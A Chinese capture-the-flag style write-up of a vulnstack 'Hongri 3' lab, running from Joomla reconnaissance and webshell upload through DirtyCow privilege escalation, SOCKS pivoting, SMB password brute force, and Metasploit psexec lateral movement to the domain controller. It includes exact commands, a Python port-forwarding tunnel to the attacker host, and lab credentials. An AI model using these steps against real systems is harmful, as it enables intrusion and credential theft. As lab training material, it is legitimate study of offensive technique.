红日3
灵境平台hongri3
本次环境为黑盒测试,不提供靶机信息环境构成:由多台靶机器组成,包括多台Windows、Linux机器,模拟了一个三层网络域的环境,有出网机、跳板机、内网主机、域控主机等不同角色的主机。目标设定:目标是拿到域控制器的权限,并找到其中的重要文件,让练习者在接近真实的企业网络环境中进行渗透测试实战。难度定位:相比前两个靶场,难度有所提升,更贴近真实红队评估场景,对练习者的综合渗透测试能力有较高要求。涉及技术: 一、信息收集: 1、网络信息收集:使用工具扫描目标网络,探测主机、开放端口、服务版本等信息,确定攻击目标的网络拓扑结构和资产情况。 2、Web信息收集:通过Wappalyzer等工具识别目标网站使用的CMS、框架等,查找其历史漏洞,为后续的攻击提供方向。 3、系统信息收集:在获取到目标主机的权限后,收集系统版本、用户信息、配置文件等,为提权等操作做准备。 二、漏洞利用: 1、WEB漏洞利用:通过漏洞利用进行getshell,获取对服务器的控制权。 2、系统漏洞利用:包括提权漏洞,以及系统中可能存在的未更新软件缺陷等,提升在目标系统中的权限。 3、中间件漏洞利用:针对目标系统中使用的中间件,查找并利用其存在的漏洞。• 三、内网渗透: 1、建立代理:使用代理工具搭建socks代理,将攻击机上的其他攻击程序带入内网,实现对内网的进一步渗透。 四、内网信息收集: 1、利用扫描内网,收集内网主机的IP地址、开放端口、服务信息等,绘制内网拓扑图。 五、横向移动 六、域渗透 七、权限维持 八、痕迹清理 原靶机项目地址:http://vulnstack.qiyuanxuetang.net/vuln/靶机ip:192.168.242.67kali:192.168.188.129cs服务端:192.168.188.129外网:joomla
fscan扫描
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144759589-1149408480.png
有个mysql的弱口令,登陆看看
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144759109-69392958.png
扫一下目录
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144758752-2063706757.png
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144758374-1789977989.png
后台登录
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144758021-785078424.png
从之前连接的数据库找找账号密码,在joomla库的am2zu_users和umnbt_users各有一个,改am2zu_users的
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144757648-1870890036.png
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144757330-1208969578.png
加密脚本
得到:原始密码: abc123
bcrypt哈希: $2y$10$41JzrIV.PAd4MKqDFxDKt.bD7LQk.Eyfq36rWjfBbm1hoScenBzjm
把密码改成这个之后去后台登录,账户密码administrator/abc123
下面这个也是个方法,用jooscan扫描得到配置文件去连接数据库
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144757009-191485803.png
直接扫
joomscan -u http://192.168.242.67/_____________________ ___ __ __ (__)(_)(_)(\/)/ __) / __)/__\( \( ).-_)( )(_)()(_)() ( \__ \( (__/(__)\)( \____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_) (1337.today) --= +---++---== FireWall Detector[++] Firewall not detected[+] Detecting Joomla Version[++] Joomla 3.9.12[+] Core Joomla Vulnerability[++] Target Joomla core is not vulnerable[+] Checking Directory Listing[++] directory has directory listing : http://192.168.242.67/administrator/componentshttp://192.168.242.67/administrator/moduleshttp://192.168.242.67/administrator/templateshttp://192.168.242.67/images/banners[+] Checking apache info/status files[++] Readable info/status files are not found[+] admin finder[++] Admin page : http://192.168.242.67/administrator/[+] Checking robots.txt existing[++] robots.txt is foundpath : http://192.168.242.67/robots.txt Interesting path found from robots.txthttp://192.168.242.67/joomla/administrator/http://192.168.242.67/administrator/http://192.168.242.67/bin/http://192.168.242.67/cache/http://192.168.242.67/cli/http://192.168.242.67/components/http://192.168.242.67/includes/http://192.168.242.67/installation/http://192.168.242.67/language/http://192.168.242.67/layouts/http://192.168.242.67/libraries/http://192.168.242.67/logs/http://192.168.242.67/modules/http://192.168.242.67/plugins/http://192.168.242.67/tmp/[+] Finding common backup files name[++] Backup files are not found[+] Finding common log files name[++] error log is not found[+] Checking sensitive config.php.x file[++] Readable config file is foundconfig file path : http://192.168.242.67/configuration.php~Your Report : reports/192.168.242.67/访问一下http://192.168.242.67/configuration.php~
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144756555-1667393717.png
Joomla! CMS 配置文件备份泄露
数据库
public $dbtype = 'mysqli'; // 数据库类型public $host = 'localhost'; // 数据库地址public $user = 'testuser'; // 数据库用户名public $password = 'cvcvgjASD!@'; // 数据库密码public $db = 'joomla'; // 数据库名public $dbprefix = 'am2zu_'; // 表前缀网站配置
public $sitename = 'test'; // 网站名称public $secret = 'gXN9Wbpk7ef3A4Ys'; // Joomla 密钥(用于加密)public $log_path = '/var/www/html/administrator/logs';// 日志路径public $tmp_path = '/var/www/html/tmp'; // 临时文件路径连一下数据库
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144756177-1870951432.png
和上一种方法结果是一样的
getshell
后台进来
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144755840-59338578.png
模板
点一个进去来到error.php,加一个一句话木马
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144755434-1360884719.png
save,访问:192.168.242.67/templates/beez3/error.php,蚁剑连接
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144755047-70943763.png
但是执行不了命令,传个哥斯拉的shell上去用哥斯拉传后门之后执行,好像也不行
我们传一个phpinfo的文件上去访问看看哪些函数被禁用了
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144754602-202257537.png
禁用了很多,翻文件翻到一个账号密码
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144754176-2133955982.png
ssh
尝试ssh登录
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144753788-1703052238.png
查看账户权限
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144753346-1039397687.png
应该是要提权的
提权
看看内核版本
$ uname -aLinux localhost.localdomain 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux尝试DirtyCow (CVE-2016-5195)
这篇文章讲的挺详细的:脏牛(DirtyCow)Linux本地提权漏洞复现(CVE-2016-5195) - 无名之辈。 - 博客园
靶机用wget下载过去就行,用kali开个http(firefart/dirtycow: Dirty Cow exploit - CVE-2016-5195)
kali:
python -m http.server 8989 #在有这个压缩包的目录下开个httpweb机:
wget http://192.168.188.129:8989/dirtycow-master.zipunzip dirtycow-master.zipcd dirtycow-mastergcc -pthread dirty.c -o dirty -lcryptchmod +x dirty./dirty 123456https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144752987-198011226.png
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144752616-1768386902.png
看看权限
idhttps://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144752166-487458934.png
和root一样的权限
信息收集
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144751852-234374672.png
扫一下93网段,传一个fscan(依旧搞一个http去访问下载)
./fscan -h 192.168.93.0/24 ___ _ / _ \ ______ _ __ __ ____| | __/ /_\/____/ __|/ __| '__/ _` |/ __| |/ // /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_|\__,_|\___|_|\_\ fscan version: 1.8.4start infoscantrying RunIcmp2The current user permissions unable to send icmp packetsstart ping(icmp) Target 192.168.93.10 is alive(icmp) Target 192.168.93.30 is alive(icmp) Target 192.168.93.20 is alive(icmp) Target 192.168.93.100is alive(icmp) Target 192.168.93.120is alive
[*] Icmp alive hosts len is: 5192.168.93.120:80 open192.168.93.100:80 open192.168.93.20:80 open192.168.93.120:22 open192.168.93.10:135 open192.168.93.30:135 open192.168.93.30:139 open192.168.93.20:139 open192.168.93.10:139 open192.168.93.10:445 open192.168.93.20:1433 open192.168.93.30:445 open192.168.93.120:3306 open192.168.93.20:445 open192.168.93.20:5555 open192.168.93.100:22 open192.168.93.20:135 open192.168.93.100:3306 open192.168.93.10:88 open
[*] alive ports len is: 19start vulscan
[*] NetInfo
[*]192.168.93.30 [->]win7 [->]192.168.93.30
[*] WebTitle http://192.168.93.20 code:404 len:315 title:Not Found
[*] NetInfo
[*]192.168.93.20 [->]win2008 [->]192.168.93.20
[*] NetInfo
[*]192.168.93.10 [->]WIN-8GA56TNV3MV [->]192.168.93.10
[*] OsInfo 192.168.93.10 (Windows Server 2012 R2 Datacenter 9600)
[*] OsInfo 192.168.93.20 (Windows Server (R) 2008 Datacenter 6003 Service Pack 2)
[*] OsInfo 192.168.93.30 (Windows 7 Professional 7601 Service Pack 1)
[*] NetBios 192.168.93.10 [+] DC:WIN-8GA56TNV3MV.test.org Windows Server 2012 R2 Datacenter 9600[+] mysql 192.168.93.100:3306:root 123[+] mysql 192.168.93.120:3306:root 123
[*] WebTitle http://192.168.93.120 code:200 len:16020title:Home
[*] WebTitle http://192.168.93.100 code:200 len:16020title:Home已完成 17/19 [-] ssh 192.168.93.120:22 root Passw0rd ssh: handshake failed: ssh: unable to authenticate, attempted methods , no supported methods remain 已完成 17/19 [-] ssh 192.168.93.120:22 root a123456 ssh: handshake failed: ssh: unable to authenticate, attempted methods , no supported methods remain存活ip加端口开放情况:
ip开放端口192.168.93.1088、135、139、445192.168.93.2080、135、139、445、1433192.168.93.30135、139、445192.168.93.12022、80、3306vshell上线
反向,搞个监听器
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144751493-126071793.png
后门生成
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144751104-219690188.png
生成的文件依旧是通过kali传输
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144750703-1289528440.png
上线
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144750330-2099126332.png
socks
因为需要和93网段通信,所以开个socks
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144750006-1368721280.png
kali配置/etc/proxychains4.conf
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144749683-250281970.png
msf
proxychains4 msfconsole但是后面发现这样去利用攻击会失败,代理需要先开了msf再全局设置一次
SMB爆破
出了120以外其他三个都开了445,尝试smb账号密码爆破(爆了半天发现我字典里面都没有这个密码,看了wp自己加进去了)
msfconsolemsf6 > setg Proxies socks5:192.168.188.129:9898msf6 > setg ReverseAllowProxy truemsf6 > use auxiliary/scanner/smb/smb_loginmsf6 > set RHOSTS 192.168.93.10msf6 > set SMBUser administratormsf6 > set PASS_FILE /mnt/hgfs/share/dictionary/keyboard.txtmsf6 > set STOP_ON_SUCCESS truemsf6 > set VERBOSE falsemsf6 > set THREADS 3msf6 > runsetg Proxies:让 msf 的所有流量都通过 vshell 开的 SOCKS5 代理(192.168.188.129:9898)
setg ReverseAllowProxy:告诉 msf 的 handler:“payload 回连的时候,也可以走代理”
auxiliary/scanner/smb/smb_login:辅助模块,暴力破解 SMB 服务的用户名和密码
STOP_ON_SUCCESS:找到正确的密码就停下来
VERBOSE:不要输出太多细节
THREADS 3:3个线程
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144749365-1144696359.png
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144748982-753312646.png
10是administrator / zxcASDqw123!!,20和30:administrator / 123qwe!ASD
192.168.93.20:win2008
msf利用psexec横向移动
msfconsolemsf6 > setg Proxies socks5:192.168.188.129:9898msf6 > setg ReverseAllowProxy truemsf6 > use exploit/windows/smb/psexecmsf6 > set RHOSTS 192.168.93.20msf6 > set SMBUser administratormsf6 > set SMBPass 123qwe!ASDmsf6 > set PAYLOAD windows/x64/meterpreter/bind_tcpmsf6 > set LPORT 5555msf6 > runexploit/windows/smb/psexec:横向移动,攻击模块
PAYLOAD windows/x64/meterpreter/bind_tcp:正向连接
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144748496-264104049.png
系统信息
systeminfohttps://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144748086-1969478392.png
win2008
看看域名
ipconfig /allhttps://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144747704-1856423433.png
test.org
ping一下看看哪个ip
ping test.orghttps://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144747014-92029633.png
192.168.93.10是域控
192.168.93.30:win7
一样的利用
msfconsolemsf6 > setg Proxies socks5:192.168.188.129:9898msf6 > setg ReverseAllowProxy truemsf6 > use exploit/windows/smb/psexecmsf6 > set RHOSTS 192.168.93.30msf6 > set SMBUser administratormsf6 > set SMBPass 123qwe!ASDmsf6 > set PAYLOAD windows/x64/meterpreter/bind_tcpmsf6 > set LPORT 6666msf6 > runhttps://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144746661-1460974571.png
win7
192.168.93.10:域控
msfconsolemsf6 > setg Proxies socks5:192.168.188.129:9898msf6 > setg ReverseAllowProxy truemsf6 > use exploit/windows/smb/psexecmsf6 > set RHOSTS 192.168.93.10msf6 > set SMBUser administratormsf6 > set SMBPass zxcASDqw123!!msf6 > set PAYLOAD windows/x64/meterpreter/bind_tcpmsf6 > set LPORT 1111msf6 > run尝试了但是不行,需要反向出来
看看有什么
which python python3 perl ruby socat nc ncat netcathttps://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144746258-883445470.png
有 Python 2.7 和 Perl,web机直接运行
python -c "import socket, threadingdef handle(client): try: target = socket.socket(socket.AF_INET, socket.SOCK_STREAM) target.connect(('192.168.188.129', 3434)) except: client.close() return def forward(src, dst): try: while True: data = src.recv(4096) if not data: break dst.send(data) except: pass finally: src.close() dst.close() t1 = threading.Thread(target=forward, args=(client, target)) t2 = threading.Thread(target=forward, args=(target, client)) t1.daemon = True t2.daemon = True t1.start() t2.start() t1.join() t2.join()server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)server.bind(('0.0.0.0', 3434))server.listen(5)print('[+] Forwarding 0.0.0.0:3434 -> 192.168.188.129:3434')while True: client, addr = server.accept() print('[+] Connection from', addr) t = threading.Thread(target=handle, args=(client,)) t.daemon = True t.start()" &这是一个TCP 端口转发脚本(也叫“隧道”或“代理”)
它的作用是:把发到 Web 服务器 3434 端口的流量,原封不动地转发到攻击机的 3434 端口
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144745921-1279009941.png
kali:
# 在攻击机上启动 msf(新终端)msfconsole# 在 msf 中设置全局代理msf6 > setg Proxies socks5:192.168.188.129:9898msf6 > setg ReverseAllowProxy truemsf6 > use exploit/windows/smb/psexecmsf6 > set RHOSTS 192.168.93.10msf6 > set SMBUser administratormsf6 > set SMBPass zxcASDqw123!!msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcpmsf6 > set LHOST 192.168.93.100# Web服务器的内网IPmsf6 > set LPORT 3434msf6 > set target 2# Native uploadmsf6 > runPAYLOAD windows/x64/meterpreter/reverse_tcp:需要域控机主动反向出去找攻击机
LHOST 192.168.93.100:让域控去找web机而不是直接找攻击机,又因为设置了端口转发所以找web的3434端口就相当于去找攻击机的3434端口
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144745583-1619490914.png
192.168.93.120
开放了22端口,尝试之前得到的那个账号密码登录
wwwuser/wwwuser_123Aqx
ssh -p 22 wwwuser@192.168.93.120https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144745139-694685260.png
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]